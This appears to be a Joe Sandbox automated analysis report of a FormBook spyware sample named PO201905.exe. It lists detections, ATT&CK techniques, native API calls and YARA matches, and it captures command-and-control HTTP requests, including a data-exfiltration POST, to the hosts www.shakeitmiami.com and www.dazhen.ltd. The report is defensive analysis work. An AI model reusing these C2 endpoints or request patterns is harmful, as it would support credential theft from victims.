Play interactive tour

Edit tour

Analysis Report PO201905.exe

Overview

General Information

Joe Sandbox Version:	26.0.0 Aquamarine
Analysis ID:	855421
Start date:	06.05.2019
Start time:	21:15:50
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 13m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO201905.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2016 v15, Java 1.8.71, Flash 20.0.0.286, Acrobat Reader 11.0.14, Internet Explorer 11, Chrome 48, Firefox 44)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies	HCA enabled EGA enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@11/6@4/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 73
Cookbook Comments:	Adjust boot time Found application associated with file extension: .exe
Warnings:	Show All Max analysis timeout: 600s exceeded, the analysis took too long Exclude process from analysis (whitelisted): WatAdminSvc.exe, dllhost.exe, sppsvc.exe, conhost.exe, slui.exe, WmiPrvSE.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Exploitation for Client Execution1	Registry Run Keys / Startup Folder1	Process Injection411	Software Packing1	Credentials in Files1	Process Discovery1	Application Deployment Software	Data from Local System1	Data Compressed	Standard Cryptographic Protocol1
Replication Through Removable Media	Service Execution	Port Monitors	Accessibility Features	Disabling Security Tools1	Network Sniffing	Security Software Discovery3	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Non-Application Layer Protocol4
Drive-by Compromise	Windows Management Instrumentation	Accessibility Features	Path Interception	Process Injection411	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Application Layer Protocol4
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information3	Credentials in Files	System Information Discovery2	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for dropped file

Show sources

Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for sample

Show sources

Source: PO201905.exe

Joe Sandbox ML: detected

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe

virustotal: Detection: 16%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: PO201905.exe

virustotal: Detection: 16%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpack	Joe Sandbox ML: detected
Source: 0.1.PO201905.exe.fb0000.0.unpack	Joe Sandbox ML: detected
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpack	Joe Sandbox ML: detected
Source: 0.2.PO201905.exe.fb0000.3.unpack	Joe Sandbox ML: detected
Source: 0.0.PO201905.exe.fb0000.0.unpack	Joe Sandbox ML: detected

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: 4x nop then pop edi		0_2_00FCEB6B
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 4x nop then pop edi		0_2_00FC66C6

Networking:

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1Host: www.shakeitmiami.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1Host: www.dazhen.ltdConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View	IP Address: 208.91.197.91 208.91.197.91
Source: Joe Sandbox View	IP Address: 208.91.197.91 208.91.197.91

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: unknown unknown

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1Host: www.shakeitmiami.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1Host: www.dazhen.ltdConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.shakeitmiami.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /c917/ HTTP/1.1Host: www.dazhen.ltdConnection: closeContent-Length: 104865Cache-Control: no-cacheOrigin: http://www.dazhen.ltdUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dazhen.ltd/c917/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6f 48 6c 34 4c 62 35 3d 71 6b 5a 51 55 73 58 75 79 5a 79 66 42 69 5a 33 77 55 69 6d 56 4a 58 5a 39 71 64 4c 59 34 6f 56 6f 55 54 69 50 70 70 63 54 47 79 51 28 42 47 54 6e 6b 48 66 44 64 6f 64 4a 6f 41 68 69 75 63 4d 7a 6f 41 74 37 64 65 55 50 6c 35 75 50 45 4c 4f 30 50 4c 6c 63 78 66 73 46 61 47 4b 6f 47 35 43 6c 33 45 47 42 6e 31 53 43 6e 79 59 59 35 41 66 49 74 33 58 54 4d 71 46 4c 43 4c 54 54 38 44 79 56 78 7e 65 71 45 70 6e 6b 71 4f 73 75 41 47 79 49 76 62 55 4a 48 4a 45 77 6f 7e 48 44 46 44 57 6f 6d 7e 4a 48 44 28 5f 6b 32 72 52 37 50 55 38 31 71 54 44 77 38 42 4c 7a 69 6f 55 44 72 74 74 48 46 78 5f 4c 68 51 58 59 78 64 44 53 54

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 1864Connection: closeDate: Mon, 06 May 2019 19:25:56 GMTVary: Accept-EncodingCache-Control: privateSet-Cookie: ASP.NET_SessionId=cvf30oid01f3tnzktbph5mu3; path=/; HttpOnlyX-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETAli-Swift-Global-Savetime: 1557170756Via: cache24.l2hk71[24,404-1280,M], cache1.l2hk71[25,0], cache18.ru3[701,404-1280,M], cache6.ru3[895,0]X-Swift-Error: orig response 4XX errorX-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-SaveTime: Mon, 06 May 2019 19:25:57 GMTX-Swift-CacheTime: 0X-Swift-Error: orig response 4XX errorTiming-Allow-Origin: *EagleId: 2ff6029a15571707562454862eData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 6

Urls found in memory or binary data

Show sources

Source: explorer.exe, 00000006.00000000.4490786039.05A85000.00000004.sdmp	String found in binary or memory: http://go.
Source: explorer.exe, 00000006.00000000.4489219800.04C00000.00000008.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.4496745744.01F30000.00000008.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp	String found in binary or memory: http://www.autoitscript.com/favicon.ico
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp	String found in binary or memory: http://www.autoitscript.com/site/autoit/

System Summary:

FormBook malware detected

Show sources

Source: C:\Windows\System32\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini	Jump to dropped file
Source: C:\Windows\System32\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrv.ini	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrf.ini	Jump to dropped file

Abnormal high CPU Usage

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD18A8 NtAllocateVirtualMemory,	0_2_00FD18A8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD16C8 NtCreateFile,	0_2_00FD16C8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD17F8 NtClose,	0_2_00FD17F8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD1778 NtReadFile,	0_2_00FD1778
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD18A2 NtAllocateVirtualMemory,	0_2_00FD18A2
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD16C2 NtCreateFile,	0_2_00FD16C2
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD171A NtReadFile,	0_2_00FD171A
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026062E0 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_026062E0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606360 NtQueueApcThread,NtQueueApcThread,	0_2_02606360
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605350 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,	0_2_02605350
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026063E0 NtReadVirtualMemory,NtReadVirtualMemory,	0_2_026063E0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026053C0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	0_2_026053C0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026063A0 NtReadFile,NtReadFile,	0_2_026063A0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606130 NtQueryInformationProcess,NtQueryInformationProcess,	0_2_02606130
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606650 NtSetContextThread,NtSetContextThread,	0_2_02606650
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026056B0 NtCreateFile,NtCreateFile,	0_2_026056B0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026057D0 NtCreateSection,NtCreateSection,	0_2_026057D0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026055B0 NtClose,NtClose,	0_2_026055B0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606590 NtResumeThread,NtResumeThread,	0_2_02606590
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605AC0 NtFreeVirtualMemory,	0_2_02605AC0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026058B0 NtDelayExecution,NtDelayExecution,	0_2_026058B0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606980 NtSuspendThread,NtSuspendThread,	0_2_02606980
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605D10 NtMapViewOfSection,NtMapViewOfSection,	0_2_02605D10
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606270 NtQuerySection,	0_2_02606270
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606340 NtQueryVirtualMemory,	0_2_02606340
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606330 NtQueryValueKey,	0_2_02606330
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606000 NtProtectVirtualMemory,	0_2_02606000
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606160 NtQueryInformationToken,	0_2_02606160
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606100 NtQueryInformationFile,	0_2_02606100
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026056F0 NtCreateKey,	0_2_026056F0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606720 NtSetInformationFile,	0_2_02606720
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605730 NtCreateMutant,	0_2_02605730
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605790 NtCreateProcessEx,	0_2_02605790
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605A00 NtEnumerateValueKey,	0_2_02605A00
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606AA0 NtUnmapViewOfSection,	0_2_02606AA0
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606B50 NtWriteFile,	0_2_02606B50
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606B00 NtWaitForSingleObject,	0_2_02606B00
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02605B00 NtGetContextThread,	0_2_02605B00
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02606B80 NtWriteVirtualMemory,	0_2_02606B80
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026068F0 NtSetValueKey,	0_2_026068F0

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD48FE	0_2_00FD48FE
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FC2468	0_2_00FC2468
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FC2463	0_2_00FC2463
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FC2422	0_2_00FC2422
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD5D7E	0_2_00FD5D7E
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD5603	0_2_00FD5603
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD4F87	0_2_00FD4F87
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02630261	0_2_02630261
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02616258	0_2_02616258
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02634221	0_2_02634221
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025E9203	0_2_025E9203
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02630301	0_2_02630301
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025C83DB	0_2_025C83DB
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025C7068	0_2_025C7068
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0268603E	0_2_0268603E
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026260ED	0_2_026260ED
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025E30C9	0_2_025E30C9
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025EE0BC	0_2_025EE0BC
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0266E139	0_2_0266E139
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025D9679	0_2_025D9679
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026907E8	0_2_026907E8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025EC447	0_2_025EC447
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0261842B	0_2_0261842B
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0268B4CF	0_2_0268B4CF
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025C44E8	0_2_025C44E8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0268548D	0_2_0268548D
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_02617495	0_2_02617495
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025EE5BF	0_2_025EE5BF
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0261BA1C	0_2_0261BA1C
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025CCB67	0_2_025CCB67
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025F3B0A	0_2_025F3B0A
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025E0BBB	0_2_025E0BBB
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026868E8	0_2_026868E8
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_026168DA	0_2_026168DA
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_025E3944	0_2_025E3944
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_0262291F	0_2_0262291F

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: String function: 025DF5FB appears 179 times
Source: C:\Users\user\Desktop\PO201905.exe	Code function: String function: 0265FD8A appears 46 times
Source: C:\Users\user\Desktop\PO201905.exe	Code function: String function: 025E1A8E appears 82 times
Source: C:\Users\user\Desktop\PO201905.exe	Code function: String function: 02612CAC appears 53 times

PE file contains strange resources

Show sources

Source: PO201905.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe0.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample file is different than original file name gathered from version info

Show sources

Source: PO201905.exe, 00000000.00000003.4481491679.00D81000.00000004.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518101641.00200000.00000008.sdmp	Binary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518066485.000F0000.00000008.sdmp	Binary or memory string: OriginalFilenameuser32j% vs PO201905.exe
Source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs PO201905.exe

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\ipconfig.exe	Section loaded: mozglue.dll			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winsqlite3.dll			Jump to behavior

Yara signature match

Show sources

Source: PO201905.exe, type: SAMPLE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489812531.05280000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489859117.053A0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000000.4605949292.01060000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499027121.02FD0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499136614.03160000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000001.4606191992.01060000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483829349.021F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489594683.04FD0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483813760.021E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4481973939.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483543065.01C90000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489196294.04B80000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482978785.00960000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485301200.02FD0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485257832.02F00000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4520123297.025C0000.00000040.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483012656.009B0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496745744.01F30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518101641.00200000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496645451.01C90000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485383734.03160000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000000.3459785508.00FB0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485420844.03230000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495827412.00730000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489866128.053E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518759786.00FB0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496873251.020D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489753137.051E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489219800.04C00000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498956019.02F00000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495226765.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483619954.01F30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498910122.02E40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.4699103178.000E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4480049922.00B60000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489600354.04FE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498921613.02E50000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489914928.05460000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482006795.00120000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518066485.000F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
